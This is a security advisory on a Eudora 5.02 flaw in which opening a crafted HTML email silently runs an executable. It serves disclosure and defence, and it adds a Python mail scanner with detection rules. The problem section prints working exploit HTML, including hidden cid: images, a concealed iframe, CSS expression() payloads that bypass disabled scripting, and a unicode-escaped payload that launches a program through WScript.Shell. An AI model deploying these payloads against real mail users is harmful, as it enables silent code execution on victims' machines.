COMMAND

    Eudora

SYSTEMS AFFECTED

    Eudora

PROBLEM

    'http-equiv' found the following.  Silent delivery and installation
    of an executable on a target computer.  No client input is required
    other than opening an email using Eudora 5.02 - Sponsored Mode,
    provided 'use Microsoft viewer' and 'allow executables in HTML
    content' are enabled.  One wonders why they are there in the first
    place.

    This can be achieved with relative ease as follows:
    1. Create yet another HTML mail message as follows:

        <img SRC="cid:mr.malware.to.you" style="display:none">
        <img id=W0W src="cid:malware.com"   style="display:none">
        <center><h6>YOU!DORA</h6></center>
        <IFRAME  id=malware width=10 height=10 style="display:none" ></IFRAME>

        <script>
        // 18.03.01 http://www.malware.com
        malware.location.href=W0W.src
        </script>

       Where our first image is our executable, and our second image
       comprises a simple JavaScript and ActiveX control.

       What happens is, once the mail message is opened in Eudora 5.02
       - Sponsored Mode, the two 'embedded' images are silently and
       instantly transferred to the 'Embedded' folder.  Our very simple
       JavaScript location.href then automatically calls our second
       image comprising the simple JavaScript and ActiveX control [note:
       knowing the file names and locations is not necessary at all],
       which is then displayed out of sight in our iframe.  This in turn
       executes our *.exe.

       Very simple.  Because our *.exe and our simple JavaScript and
       ActiveX control reside in the same folder [the so-called
       "Embedded" folder], and because it is automatically called into
       our iframe, everything is instant.

       No warning, no nothing.   The *.exe is executed instantly.   No
       client input other than opening the email.

    2. Working Example.  Harmless *.exe incorporated.  Tested on win98,
       with IE5.5 (all of its patches and so-called service packs),
       Eudora 5.02 - Sponsored Mode with 'use Microsoft viewer' and
       'allow executables in HTML content' enabled (the latter refers
       to scripting, not literally executables).

       The following is in plaintext.  We are unable to figure out how
       to import a single message  into Eudora's inbox.  Perhaps  some
       bright spark  knows.   Otherwise, incorporate  the text  sample
       into a  telnet session  or other  and fire  off to  your Eudora
       inbox:

        http://www.malware.com/you!DORA.txt

    The "Allow executables in HTML content" setting is turned off by
    default.  The online help and user manual mention that the setting
    should remain off for security reasons.  This of course is 100%
    correct.  Unfortunately, on closer examination we find that this
    too can be defeated quite easily.  Consider the following, which
    uses no JavaScript at all:

        <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
        
        <img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
        height=2 width=2
        STYLE="left:expression(location.href='http://www.malware.com');"></html>
        
        <br>
        <br>
        </body></html>

    This slips through with "Allow executables in HTML content"
    disabled, because the script is carried in a CSS expression() inside
    a style attribute rather than in a script block.  Therefore the
    results will be the same:

        <img SRC="" height=1 width=1
        STYLE="left:expression(malware.location.href='cid:malware.com');"></

    ...etc

    Further to all of this, we include a more generic and illustrative
    (and user-friendly) working test example.  This defeats the
    so-called "Allow executables in HTML content" setting being
    disabled.  It is specifically constructed to fire the ActiveX
    warning so that the behaviour is visually illustrated (harmless WSH
    call that launches telnet if you click OK).

    This is by  design and only  for illustrative purposes  (lest some
    idiot complain this demo has a warning and is a lame "exploit").

        <img SRC="cid:malware.com" height=2 width=2
        STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074
        \u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u0
        03c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e
        \u0030\u0031\u0020\u002d\u002d\u003e'))">
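    The constructs shown above (hidden cid: images, a concealed iframe
    driven by a script block, and CSS expression() in a style attribute
    carrying script even when scripting is "disabled") are easy to flag
    on the mail gateway or in a local filter.  The following Python
    scanner is an added example and is not part of this advisory or of
    Eudora; the sample messages are constructed here, modelled on the
    snippets above, and the rule names and thresholds are the author's
    own choices rather than anything Eudora provides.  It also unfolds
    \uXXXX escapes before matching so that the obfuscated
    document.write() variant is caught as well.

```python
import re

# Constructed sample mail bodies modelled on the advisory's snippets
# (hypothetical test data, not the advisory's actual test message).
SAMPLE_SCRIPT_MAIL = """<img SRC="cid:mr.malware.to.you" style="display:none">
<img id=W0W src="cid:malware.com" style="display:none">
<IFRAME id=malware width=10 height=10 style="display:none"></IFRAME>
<script>malware.location.href=W0W.src</script>"""

SAMPLE_FILE_MAIL = r"""<img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif" height=2 width=2
STYLE="left:expression(location.href='http://www.malware.com');">"""

SAMPLE_EXPRESSION_MAIL = """<img SRC="" height=1 width=1
STYLE="left:expression(malware.location.href='cid:malware.com');">"""

# The payload is \u-escaped so a naive "<script" search on the raw text misses it.
SAMPLE_UNICODE_MAIL = r"""<img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e'))">"""

# A normal HTML mail with a visible embedded logo: should produce no findings.
SAMPLE_BENIGN_MAIL = """<html><body><p>Hello,</p>
<img src="cid:logo" width=100 height=20></body></html>"""

# Detection rules (rule names are this example's own, not an Eudora setting).
RULES = [
    ("script-tag",     re.compile(r"<\s*script\b", re.I)),
    ("iframe",         re.compile(r"<\s*iframe\b", re.I)),
    # script smuggled through a CSS expression() inside a style attribute
    ("css-expression", re.compile(r"style\s*=\s*[\"'][^\"']*expression\s*\(", re.I | re.S)),
    # an image the reader is not meant to see
    ("hidden-image",   re.compile(r"<\s*img\b[^>]*display\s*:\s*none", re.I | re.S)),
    # references into the local filesystem (e.g. the Embedded folder)
    ("local-file-ref", re.compile(r"(?:src|href)\s*=\s*[\"']?file:", re.I)),
]


def decode_js_escapes(text):
    """Replace JavaScript \\uXXXX escapes with the characters they encode."""
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), text)


def scan_html_mail(body):
    """Return the sorted list of rule names that match the mail body.

    Each rule is run against both the raw body and a copy with \\uXXXX
    escapes unfolded, so obfuscated payloads inside expression() are
    matched on the same terms as plain ones.
    """
    findings = set()
    for variant in (body, decode_js_escapes(body)):
        for name, pattern in RULES:
            if pattern.search(variant):
                findings.add(name)
    return sorted(findings)


def is_suspicious(body):
    """True when any rule fires; a gateway would quarantine or strip HTML."""
    return bool(scan_html_mail(body))


if __name__ == "__main__":
    samples = {
        "script/iframe mail": SAMPLE_SCRIPT_MAIL,
        "file:// expression mail": SAMPLE_FILE_MAIL,
        "cid: expression mail": SAMPLE_EXPRESSION_MAIL,
        "\\u-escaped expression mail": SAMPLE_UNICODE_MAIL,
        "benign mail": SAMPLE_BENIGN_MAIL,
    }
    for label, body in samples.items():
        print(f"{label:28s} -> {scan_html_mail(body)}")
```

    The css-expression rule is the one that matters once scripting is
    switched off in the client, since it is the only one of the three
    delivery methods above that survives that setting; a filter that
    only looks for <script> would pass the second and third messages.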

SOLUTION

    Disable  'use  Microsoft  viewer'  and  'allow executables in HTML
    content'.

    This inline scripting hole has been  fixed in Eudora 5.1.  A  beta
    of 5.1 can  be found at  http://www.eudora.com/betas/.  The  final
    release of 5.1 will be out very soon.